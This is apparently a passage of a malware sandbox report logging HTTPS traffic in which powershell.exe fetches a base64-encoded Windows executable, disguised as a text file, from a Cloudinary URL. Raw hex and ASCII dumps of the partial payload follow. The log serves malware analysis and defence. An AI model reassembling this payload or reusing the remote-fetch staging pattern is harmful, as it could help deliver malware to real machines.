                                                                                          Data Ascii: EAmwUAAAEAwwwAAAEAswMAAAEA9A0AAAIAiAoAAAEAywkAAAIA0wMJANoKAQARANoKBgAZANoKCgApANoKEAAxANoKEAA5ANoKEABBANoKEABJANoKEABRANoKEABZANoKEABhANoKFQBpANoKEABxANoKEACBANoKBgCJANoKBgC5ANoKBgAhAdoJHwChANoKJAApAewMHwCRANoKLAAxAd0MMgB5ANoKBgCpANoKBgA5AdcMSABJAXQOUwCpA
                                                                                          2024-12-11 10:25:13 UTC1378INData Raw: 44 77 42 41 56 67 41 41 45 41 42 51 56 67 41 41 45 51 42 59 56 67 41 41 45 67 42 67 56 67 41 41 45 77 41 45 67 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6f 42 51 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 56 51 4c 56 41 77 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 56 41 73 55 49 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 34 43 43 77 30 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 56 51 4c 67 43 77 41 41 41 41 41 4b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 65 41 76 30 44 41 41 41 41 41 41 73 41 41 67 41 4d 41 41 63 41 44 51 41 4a 41 41 34 41 43 67 41 50 41 41 6f 41 45 41 41 4b 41 42 45 41 43 67 41 53 41 41 6f 41 45 77 41 4b 41 41 41 41 41 41 41 41 50 44 34
                                                                                          Data Ascii: DwBAVgAAEABQVgAAEQBYVgAAEgBgVgAAEwAEgAAAAQAAAAAAAAAAAAAAAAAoBQAABAAAAAAAAAAAAAAAVQLVAwAAAAAEAAAAAAAAAAAAAABVAsUIAAAAAAQAAAAAAAAAAAAAAF4CCw0AAAAABAAAAAAAAAAAAAAAVQLgCwAAAAAKAAAAAAAAAAAAAABeAv0DAAAAAAsAAgAMAAcADQAJAA4ACgAPAAoAEAAKABEACgASAAoAEwAKAAAAAAAAPD4
                                                                                          2024-12-11 10:25:13 UTC1378INData Raw: 55 31 4d 45 55 31 4e 55 4d 79 51 7a 67 33 4f 55 59 79 4d 6a 4d 79 4f 54 6c 46 51 6a 45 31 4e 30 56 45 4e 54 67 78 4d 7a 46 47 4e 44 6c 45 4e 7a 56 44 51 7a 68 45 52 44 68 46 41 45 56 59 52 55 4e 56 56 45 6c 50 54 6c 39 54 56 45 46 55 52 51 42 48 41 45 67 41 52 31 5a 4a 41 45 6f 41 54 51 42 4f 41 46 4e 35 63 33 52 6c 62 53 35 4a 54 77 42 4a 55 41 42 52 41 45 56 54 58 30 4e 50 54 6c 52 4a 54 6c 56 50 56 56 4d 41 56 41 42 48 5a 58 52 42 56 67 42 48 52 6c 63 41 57 41 42 32 59 57 78 31 5a 56 39 66 41 45 64 6c 64 45 4e 68 62 57 56 79 59 51 42 74 63 32 4e 76 63 6d 78 70 59 67 41 38 50 6d 4d 41 55 33 6c 7a 64 47 56 74 4c 6b 4e 76 62 47 78 6c 59 33 52 70 62 32 35 7a 4c 6b 64 6c 62 6d 56 79 61 57 4d 41 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 4c 6c 5a 70 63 33 56 68 62
                                                                                          Data Ascii: U1MEU1NUMyQzg3OUYyMjMyOTlFQjE1N0VENTgxMzFGNDlENzVDQzhERDhFAEVYRUNVVElPTl9TVEFURQBHAEgAR1ZJAEoATQBOAFN5c3RlbS5JTwBJUABRAEVTX0NPTlRJTlVPVVMAVABHZXRBVgBHRlcAWAB2YWx1ZV9fAEdldENhbWVyYQBtc2NvcmxpYgA8PmMAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMATWljcm9zb2Z0LlZpc3Vhb


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.449738151.101.1.1374438188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-11 10:25:29 UTC116OUTGET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1
                                                                                          Host: res.cloudinary.com
                                                                                          Connection: Keep-Alive
                                                                                          2024-12-11 10:25:29 UTC645INHTTP/1.1 200 OK
                                                                                          Connection: close
                                                                                          Content-Length: 22528
                                                                                          Content-Type: text/plain
                                                                                          Etag: "cb75e1ff3f0a9c976292f34e67a24826"
                                                                                          Last-Modified: Tue, 10 Dec 2024 21:06:18 GMT
                                                                                          Date: Wed, 11 Dec 2024 10:25:29 GMT
                                                                                          Vary: Accept-Encoding
                                                                                          Strict-Transport-Security: max-age=604800
                                                                                          Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                          Server-Timing: cld-fastly;dur=1;start=2024-12-11T10:25:29.331Z;desc=hit,rtt;dur=172
                                                                                          Server: Cloudinary
                                                                                          Timing-Allow-Origin: *
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Accept-Ranges: bytes
                                                                                          Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,Vary
                                                                                          x-request-id: 156949546e77fa312c2e390d2cd36212
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 44 62 52 39 2b 30 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 67 41 4c 41 54 41 41 41 44 67 41 41 41 41 49 41 41 41 41 41 41 41 41 46 6c 59 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                          Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDADbR9+0AAAAAAAAAAOAAIgALATAAADgAAAAIAAAAAAAAFlYAAAAgAAAAYAAAAABAAAAgAAAAAgA
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 41 41 41 41 70 79 74 51 41 41 63 48 34 45 41 41 41 45 4b 42 6f 41 41 41 5a 79 79 51 41 41 63 41 63 58 6d 69 67 68 41 41 41 4b 46 32 38 69 41 41 41 4b 46 50 34 44 45 77 59 52 42 6a 6d 35 41 41 41 41 41 41 41 43 66 67 45 41 41 41 52 2b 41 67 41 41 42 41 63 61 6d 67 63 62 6d 6e 34 44 41 41 41 45 4b 42 73 41 41 41 5a 79 7a 51 41 41 63 43 67 51 41 41 41 47 4b 42 38 41 41 41 6f 6f 47 67 41 41 42 6e 4c 52 41 41 42 77 66 67 51 41 41 41 51 6f 47 67 41 41 42 6e 49 4a 41 51 42 77 42 78 65 61 4b 43 45 41 41 41 6f 48 46 35 6f 55 4b 43 4d 41 41 41 70 76 4a 41 41 41 43 67 63 59 6d 69 67 6c 41 41 41 4b 42 78 6d 61 4b 43 59 41 41 41 6f 48 46 35 6f 58 4b 41 55 41 41 41 59 41 41 4e 34 2b 4a 67 41 64 6a 53 6b 41 41 41 45 6c 46 6e 49 50 41 51 42 77 6f 69 55 58 42 71 49 6c 47
                                                                                          Data Ascii: AAAApytQAAcH4EAAAEKBoAAAZyyQAAcAcXmighAAAKF28iAAAKFP4DEwYRBjm5AAAAAAACfgEAAAR+AgAABAcamgcbmn4DAAAEKBsAAAZyzQAAcCgQAAAGKB8AAAooGgAABnLRAABwfgQAAAQoGgAABnIJAQBwBxeaKCEAAAoHF5oUKCMAAApvJAAACgcYmiglAAAKBxmaKCYAAAoHF5oXKAUAAAYAAN4+JgAdjSkAAAElFnIPAQBwoiUXBqIlG
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 41 41 41 4b 46 50 34 42 45 77 63 52 42 79 77 6f 41 41 4a 79 30 51 41 41 63 48 34 45 41 41 41 45 4b 42 6f 41 41 41 5a 79 79 51 41 41 63 41 34 4a 4b 43 45 41 41 41 6f 4f 43 51 34 47 4b 41 63 41 41 41 59 41 41 41 44 65 42 53 59 41 41 4e 34 41 44 67 6f 57 2f 67 45 54 43 42 45 49 4c 43 67 41 41 6e 4c 52 41 41 42 77 66 67 51 41 41 41 51 6f 47 67 41 41 42 6e 4c 4a 41 41 42 77 44 67 6b 6f 49 51 41 41 43 67 34 4a 44 67 59 6f 42 77 41 41 42 67 41 41 41 41 44 65 42 53 59 41 41 4e 34 41 4b 6b 45 30 41 41 41 41 41 41 41 41 79 77 41 41 41 46 73 41 41 41 41 6d 41 51 41 41 42 51 41 41 41 41 38 41 41 41 45 41 41 41 41 41 41 51 41 41 41 47 45 42 41 41 42 69 41 51 41 41 42 51 41 41 41 41 38 41 41 41 45 62 4d 41 63 41 54 67 41 41 41 41 51 41 41 42 45 41 41 42 71 4e 4d 41 41
                                                                                          Data Ascii: AAAKFP4BEwcRBywoAAJy0QAAcH4EAAAEKBoAAAZyyQAAcA4JKCEAAAoOCQ4GKAcAAAYAAADeBSYAAN4ADgoW/gETCBEILCgAAnLRAABwfgQAAAQoGgAABnLJAABwDgkoIQAACg4JDgYoBwAABgAAAADeBSYAAN4AKkE0AAAAAAAAywAAAFsAAAAmAQAABQAAAA8AAAEAAAAAAQAAAGEBAABiAQAABQAAAA8AAAEbMAcATgAAAAQAABEAABqNMAA
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 41 41 41 51 42 54 56 41 41 46 44 77 41 41 41 52 73 77 41 67 42 75 41 41 41 41 43 51 41 41 45 51 41 41 41 48 49 56 41 67 42 77 63 30 41 41 41 41 6f 6f 51 51 41 41 43 6d 39 43 41 41 41 4b 43 69 73 6f 42 6d 39 44 41 41 41 4b 64 42 6f 41 41 41 45 4c 41 41 64 79 55 51 49 41 63 47 39 45 41 41 41 4b 4b 45 55 41 41 41 6f 4d 45 67 49 6f 52 67 41 41 43 67 33 65 4b 67 5a 76 52 77 41 41 43 69 33 51 33 67 73 47 4c 41 63 47 62 30 67 41 41 41 6f 41 33 41 44 65 43 69 59 41 63 74 38 42 41 48 41 4e 33 67 68 79 33 77 45 41 63 41 30 72 41 41 6b 71 41 41 41 42 48 41 41 41 41 67 41 59 41 44 52 4d 41 41 73 41 41 41 41 41 41 41 41 42 41 46 6c 61 41 41 6f 50 41 41 41 42 47 7a 41 44 41 4d 6f 41 41 41 41 4b 41 41 41 52 41 41 42 2b 53 51 41 41 43 67 6f 41 63 6d 73 43 41 48 42 7a 4d
                                                                                          Data Ascii: AAAQBTVAAFDwAAARswAgBuAAAACQAAEQAAAHIVAgBwc0AAAAooQQAACm9CAAAKCisoBm9DAAAKdBoAAAELAAdyUQIAcG9EAAAKKEUAAAoMEgIoRgAACg3eKgZvRwAACi3Q3gsGLAcGb0gAAAoA3ADeCiYAct8BAHAN3ghy3wEAcA0rAAkqAAABHAAAAgAYADRMAAsAAAAAAAABAFlaAAoPAAABGzADAMoAAAAKAAARAAB+SQAACgoAcmsCAHBzM
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 49 44 39 43 44 77 42 76 58 77 41 41 43 67 41 6c 49 44 39 43 44 77 42 76 59 41 41 41 43 67 43 41 43 51 41 41 42 48 34 4a 41 41 41 45 66 67 45 41 41 41 52 2b 41 67 41 41 42 43 68 68 41 41 41 4b 62 32 49 41 41 41 6f 41 46 34 41 4b 41 41 41 45 4b 41 34 41 41 41 59 6f 49 41 41 41 42 67 41 55 2f 67 59 65 41 41 41 47 63 32 4d 41 41 41 6f 4b 42 68 51 67 4d 48 55 41 41 43 41 77 64 51 41 41 63 32 51 41 41 41 71 41 44 41 41 41 42 48 4e 6c 41 41 41 4b 67 41 73 41 41 41 51 41 33 68 59 6d 41 42 61 41 43 67 41 41 42 43 43 34 43 77 41 41 4b 42 45 41 41 41 6f 41 41 4e 34 41 41 48 34 4b 41 41 41 45 46 76 34 42 43 77 63 36 45 66 2f 2f 2f 7a 67 33 41 51 41 41 41 41 42 2b 43 51 41 41 42 42 55 57 62 32 59 41 41 41 6f 73 44 58 34 4a 41 41 41 45 62 32 63 41 41 41 6f 57 4d 51 39
                                                                                          Data Ascii: ID9CDwBvXwAACgAlID9CDwBvYAAACgCACQAABH4JAAAEfgEAAAR+AgAABChhAAAKb2IAAAoAF4AKAAAEKA4AAAYoIAAABgAU/gYeAAAGc2MAAAoKBhQgMHUAACAwdQAAc2QAAAqADAAABHNlAAAKgAsAAAQA3hYmABaACgAABCC4CwAAKBEAAAoAAN4AAH4KAAAEFv4BCwc6Ef///zg3AQAAAAB+CQAABBUWb2YAAAosDX4JAAAEb2cAAAoWMQ9
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 45 41 63 33 45 41 41 41 6f 4b 63 32 55 41 41 41 6f 4c 63 32 55 41 41 41 6f 4d 41 69 67 59 41 41 41 47 41 78 55 58 4b 42 67 41 41 41 6f 4e 42 77 49 57 43 52 61 61 62 32 77 41 41 41 70 76 61 67 41 41 43 67 41 49 41 67 6b 57 6d 6d 39 73 41 41 41 4b 41 32 39 73 41 41 41 4b 57 41 4b 4f 61 51 6b 57 6d 6d 39 73 41 41 41 4b 41 32 39 73 41 41 41 4b 57 46 6c 76 61 67 41 41 43 67 41 47 42 32 39 72 41 41 41 4b 62 33 49 41 41 41 6f 41 42 67 68 76 61 77 41 41 43 6d 39 79 41 41 41 4b 41 41 64 76 56 67 41 41 43 67 41 49 62 31 59 41 41 41 6f 41 42 6d 39 7a 41 41 41 4b 45 77 51 72 41 42 45 45 4b 69 35 7a 49 77 41 41 42 6f 41 55 41 41 41 45 4b 69 49 43 4b 42 59 41 41 41 6f 41 4b 6a 59 41 66 67 59 41 41 41 52 76 64 41 41 41 43 67 41 71 49 67 49 6f 46 67 41 41 43 67 41 71 61
                                                                                          Data Ascii: EAc3EAAAoKc2UAAAoLc2UAAAoMAigYAAAGAxUXKBgAAAoNBwIWCRaab2wAAApvagAACgAIAgkWmm9sAAAKA29sAAAKWAKOaQkWmm9sAAAKA29sAAAKWFlvagAACgAGB29rAAAKb3IAAAoABghvawAACm9yAAAKAAdvVgAACgAIb1YAAAoABm9zAAAKEwQrABEEKi5zIwAABoAUAAAEKiICKBYAAAoAKjYAfgYAAARvdAAACgAqIgIoFgAACgAqa
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 41 43 49 41 41 67 45 41 41 48 6f 44 41 41 42 74 41 42 59 41 4a 51 41 44 41 52 41 41 46 77 41 41 41 44 30 41 47 67 41 6c 41 42 4d 42 41 41 42 73 41 41 41 41 6a 51 41 62 41 43 63 41 45 77 45 41 41 47 38 42 41 41 43 4e 41 42 73 41 4a 77 41 54 41 51 41 41 30 41 45 41 41 49 30 41 47 77 41 6e 41 42 4d 42 41 41 44 73 41 51 41 41 6a 51 41 62 41 43 63 41 45 77 45 41 41 46 49 43 41 41 43 4e 41 42 73 41 4a 77 41 54 41 51 41 41 79 51 41 41 41 49 30 41 47 77 41 6e 41 42 59 41 58 67 31 68 41 52 59 41 53 51 31 68 41 52 59 41 50 51 52 68 41 52 59 41 7a 77 31 68 41 52 59 41 48 41 35 68 41 52 59 41 77 67 31 34 41 68 59 41 69 41 70 68 41 52 59 41 4e 77 68 38 41 68 45 41 42 41 32 41 41 68 59 41 4d 51 53 45 41 68 45 41 70 41 69 48 41 68 45 41 73 77 79 4c 41 6a 4d 42 4f 51 4f
                                                                                          Data Ascii: ACIAAgEAAHoDAABtABYAJQADARAAFwAAAD0AGgAlABMBAABsAAAAjQAbACcAEwEAAG8BAACNABsAJwATAQAA0AEAAI0AGwAnABMBAADsAQAAjQAbACcAEwEAAFICAACNABsAJwATAQAAyQAAAI0AGwAnABYAXg1hARYASQ1hARYAPQRhARYAzw1hARYAHA5hARYAwg14AhYAiAphARYANwh8AhEABA2AAhYAMQSEAhEApAiHAhEAswyLAjMBOQO
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 45 41 6d 77 55 41 41 41 45 41 77 77 77 41 41 41 45 41 73 77 4d 41 41 41 45 41 39 41 30 41 41 41 49 41 69 41 6f 41 41 41 45 41 79 77 6b 41 41 41 49 41 30 77 4d 4a 41 4e 6f 4b 41 51 41 52 41 4e 6f 4b 42 67 41 5a 41 4e 6f 4b 43 67 41 70 41 4e 6f 4b 45 41 41 78 41 4e 6f 4b 45 41 41 35 41 4e 6f 4b 45 41 42 42 41 4e 6f 4b 45 41 42 4a 41 4e 6f 4b 45 41 42 52 41 4e 6f 4b 45 41 42 5a 41 4e 6f 4b 45 41 42 68 41 4e 6f 4b 46 51 42 70 41 4e 6f 4b 45 41 42 78 41 4e 6f 4b 45 41 43 42 41 4e 6f 4b 42 67 43 4a 41 4e 6f 4b 42 67 43 35 41 4e 6f 4b 42 67 41 68 41 64 6f 4a 48 77 43 68 41 4e 6f 4b 4a 41 41 70 41 65 77 4d 48 77 43 52 41 4e 6f 4b 4c 41 41 78 41 64 30 4d 4d 67 42 35 41 4e 6f 4b 42 67 43 70 41 4e 6f 4b 42 67 41 35 41 64 63 4d 53 41 42 4a 41 58 51 4f 55 77 43 70 41
                                                                                          Data Ascii: EAmwUAAAEAwwwAAAEAswMAAAEA9A0AAAIAiAoAAAEAywkAAAIA0wMJANoKAQARANoKBgAZANoKCgApANoKEAAxANoKEAA5ANoKEABBANoKEABJANoKEABRANoKEABZANoKEABhANoKFQBpANoKEABxANoKEACBANoKBgCJANoKBgC5ANoKBgAhAdoJHwChANoKJAApAewMHwCRANoKLAAxAd0MMgB5ANoKBgCpANoKBgA5AdcMSABJAXQOUwCpA
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 44 77 42 41 56 67 41 41 45 41 42 51 56 67 41 41 45 51 42 59 56 67 41 41 45 67 42 67 56 67 41 41 45 77 41 45 67 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6f 42 51 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 56 51 4c 56 41 77 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 56 41 73 55 49 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 34 43 43 77 30 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 56 51 4c 67 43 77 41 41 41 41 41 4b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 65 41 76 30 44 41 41 41 41 41 41 73 41 41 67 41 4d 41 41 63 41 44 51 41 4a 41 41 34 41 43 67 41 50 41 41 6f 41 45 41 41 4b 41 42 45 41 43 67 41 53 41 41 6f 41 45 77 41 4b 41 41 41 41 41 41 41 41 50 44 34
                                                                                          Data Ascii: DwBAVgAAEABQVgAAEQBYVgAAEgBgVgAAEwAEgAAAAQAAAAAAAAAAAAAAAAAoBQAABAAAAAAAAAAAAAAAVQLVAwAAAAAEAAAAAAAAAAAAAABVAsUIAAAAAAQAAAAAAAAAAAAAAF4CCw0AAAAABAAAAAAAAAAAAAAAVQLgCwAAAAAKAAAAAAAAAAAAAABeAv0DAAAAAAsAAgAMAAcADQAJAA4ACgAPAAoAEAAKABEACgASAAoAEwAKAAAAAAAAPD4
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 55 31 4d 45 55 31 4e 55 4d 79 51 7a 67 33 4f 55 59 79 4d 6a 4d 79 4f 54 6c 46 51 6a 45 31 4e 30 56 45 4e 54 67 78 4d 7a 46 47 4e 44 6c 45 4e 7a 56 44 51 7a 68 45 52 44 68 46 41 45 56 59 52 55 4e 56 56 45 6c 50 54 6c 39 54 56 45 46 55 52 51 42 48 41 45 67 41 52 31 5a 4a 41 45 6f 41 54 51 42 4f 41 46 4e 35 63 33 52 6c 62 53 35 4a 54 77 42 4a 55 41 42 52 41 45 56 54 58 30 4e 50 54 6c 52 4a 54 6c 56 50 56 56 4d 41 56 41 42 48 5a 58 52 42 56 67 42 48 52 6c 63 41 57 41 42 32 59 57 78 31 5a 56 39 66 41 45 64 6c 64 45 4e 68 62 57 56 79 59 51 42 74 63 32 4e 76 63 6d 78 70 59 67 41 38 50 6d 4d 41 55 33 6c 7a 64 47 56 74 4c 6b 4e 76 62 47 78 6c 59 33 52 70 62 32 35 7a 4c 6b 64 6c 62 6d 56 79 61 57 4d 41 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 4c 6c 5a 70 63 33 56 68 62
                                                                                          Data Ascii: U1MEU1NUMyQzg3OUYyMjMyOTlFQjE1N0VENTgxMzFGNDlENzVDQzhERDhFAEVYRUNVVElPTl9TVEFURQBHAEgAR1ZJAEoATQBOAFN5c3RlbS5JTwBJUABRAEVTX0NPTlRJTlVPVVMAVABHZXRBVgBHRlcAWAB2YWx1ZV9fAEdldENhbWVyYQBtc2NvcmxpYgA8PmMAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMATWljcm9zb2Z0LlZpc3Vhb


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.449739151.101.1.1374431720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-11 10:25:36 UTC116OUTGET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1
                                                                                          Host: res.cloudinary.com
                                                                                          Connection: Keep-Alive
                                                                                          2024-12-11 10:25:37 UTC651INHTTP/1.1 200 OK
                                                                                          Connection: close
                                                                                          Content-Length: 22528
                                                                                          Content-Type: text/plain
                                                                                          Etag: "cb75e1ff3f0a9c976292f34e67a24826"
                                                                                          Last-Modified: Tue, 10 Dec 2024 21:06:18 GMT
                                                                                          Date: Wed, 11 Dec 2024 10:25:36 GMT
                                                                                          Vary: Accept-Encoding
                                                                                          Strict-Transport-Security: max-age=604800
                                                                                          Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                          Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-11T10:25:36.938Z;desc=hit,rtt;dur=169
                                                                                          Server: Cloudinary
                                                                                          Timing-Allow-Origin: *
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Accept-Ranges: bytes
                                                                                          Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,Vary
                                                                                          x-request-id: 156949546e77fa312c2e390d2cd36212
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 44 62 52 39 2b 30 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 67 41 4c 41 54 41 41 41 44 67 41 41 41 41 49 41 41 41 41 41 41 41 41 46 6c 59 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                          Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDADbR9+0AAAAAAAAAAOAAIgALATAAADgAAAAIAAAAAAAAFlYAAAAgAAAAYAAAAABAAAAgAAAAAgA
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 41 41 41 41 70 79 74 51 41 41 63 48 34 45 41 41 41 45 4b 42 6f 41 41 41 5a 79 79 51 41 41 63 41 63 58 6d 69 67 68 41 41 41 4b 46 32 38 69 41 41 41 4b 46 50 34 44 45 77 59 52 42 6a 6d 35 41 41 41 41 41 41 41 43 66 67 45 41 41 41 52 2b 41 67 41 41 42 41 63 61 6d 67 63 62 6d 6e 34 44 41 41 41 45 4b 42 73 41 41 41 5a 79 7a 51 41 41 63 43 67 51 41 41 41 47 4b 42 38 41 41 41 6f 6f 47 67 41 41 42 6e 4c 52 41 41 42 77 66 67 51 41 41 41 51 6f 47 67 41 41 42 6e 49 4a 41 51 42 77 42 78 65 61 4b 43 45 41 41 41 6f 48 46 35 6f 55 4b 43 4d 41 41 41 70 76 4a 41 41 41 43 67 63 59 6d 69 67 6c 41 41 41 4b 42 78 6d 61 4b 43 59 41 41 41 6f 48 46 35 6f 58 4b 41 55 41 41 41 59 41 41 4e 34 2b 4a 67 41 64 6a 53 6b 41 41 41 45 6c 46 6e 49 50 41 51 42 77 6f 69 55 58 42 71 49 6c 47
                                                                                          Data Ascii: AAAApytQAAcH4EAAAEKBoAAAZyyQAAcAcXmighAAAKF28iAAAKFP4DEwYRBjm5AAAAAAACfgEAAAR+AgAABAcamgcbmn4DAAAEKBsAAAZyzQAAcCgQAAAGKB8AAAooGgAABnLRAABwfgQAAAQoGgAABnIJAQBwBxeaKCEAAAoHF5oUKCMAAApvJAAACgcYmiglAAAKBxmaKCYAAAoHF5oXKAUAAAYAAN4+JgAdjSkAAAElFnIPAQBwoiUXBqIlG
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 41 41 41 4b 46 50 34 42 45 77 63 52 42 79 77 6f 41 41 4a 79 30 51 41 41 63 48 34 45 41 41 41 45 4b 42 6f 41 41 41 5a 79 79 51 41 41 63 41 34 4a 4b 43 45 41 41 41 6f 4f 43 51 34 47 4b 41 63 41 41 41 59 41 41 41 44 65 42 53 59 41 41 4e 34 41 44 67 6f 57 2f 67 45 54 43 42 45 49 4c 43 67 41 41 6e 4c 52 41 41 42 77 66 67 51 41 41 41 51 6f 47 67 41 41 42 6e 4c 4a 41 41 42 77 44 67 6b 6f 49 51 41 41 43 67 34 4a 44 67 59 6f 42 77 41 41 42 67 41 41 41 41 44 65 42 53 59 41 41 4e 34 41 4b 6b 45 30 41 41 41 41 41 41 41 41 79 77 41 41 41 46 73 41 41 41 41 6d 41 51 41 41 42 51 41 41 41 41 38 41 41 41 45 41 41 41 41 41 41 51 41 41 41 47 45 42 41 41 42 69 41 51 41 41 42 51 41 41 41 41 38 41 41 41 45 62 4d 41 63 41 54 67 41 41 41 41 51 41 41 42 45 41 41 42 71 4e 4d 41 41
                                                                                          Data Ascii: AAAKFP4BEwcRBywoAAJy0QAAcH4EAAAEKBoAAAZyyQAAcA4JKCEAAAoOCQ4GKAcAAAYAAADeBSYAAN4ADgoW/gETCBEILCgAAnLRAABwfgQAAAQoGgAABnLJAABwDgkoIQAACg4JDgYoBwAABgAAAADeBSYAAN4AKkE0AAAAAAAAywAAAFsAAAAmAQAABQAAAA8AAAEAAAAAAQAAAGEBAABiAQAABQAAAA8AAAEbMAcATgAAAAQAABEAABqNMAA
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 41 41 41 51 42 54 56 41 41 46 44 77 41 41 41 52 73 77 41 67 42 75 41 41 41 41 43 51 41 41 45 51 41 41 41 48 49 56 41 67 42 77 63 30 41 41 41 41 6f 6f 51 51 41 41 43 6d 39 43 41 41 41 4b 43 69 73 6f 42 6d 39 44 41 41 41 4b 64 42 6f 41 41 41 45 4c 41 41 64 79 55 51 49 41 63 47 39 45 41 41 41 4b 4b 45 55 41 41 41 6f 4d 45 67 49 6f 52 67 41 41 43 67 33 65 4b 67 5a 76 52 77 41 41 43 69 33 51 33 67 73 47 4c 41 63 47 62 30 67 41 41 41 6f 41 33 41 44 65 43 69 59 41 63 74 38 42 41 48 41 4e 33 67 68 79 33 77 45 41 63 41 30 72 41 41 6b 71 41 41 41 42 48 41 41 41 41 67 41 59 41 44 52 4d 41 41 73 41 41 41 41 41 41 41 41 42 41 46 6c 61 41 41 6f 50 41 41 41 42 47 7a 41 44 41 4d 6f 41 41 41 41 4b 41 41 41 52 41 41 42 2b 53 51 41 41 43 67 6f 41 63 6d 73 43 41 48 42 7a 4d
                                                                                          Data Ascii: AAAQBTVAAFDwAAARswAgBuAAAACQAAEQAAAHIVAgBwc0AAAAooQQAACm9CAAAKCisoBm9DAAAKdBoAAAELAAdyUQIAcG9EAAAKKEUAAAoMEgIoRgAACg3eKgZvRwAACi3Q3gsGLAcGb0gAAAoA3ADeCiYAct8BAHAN3ghy3wEAcA0rAAkqAAABHAAAAgAYADRMAAsAAAAAAAABAFlaAAoPAAABGzADAMoAAAAKAAARAAB+SQAACgoAcmsCAHBzM
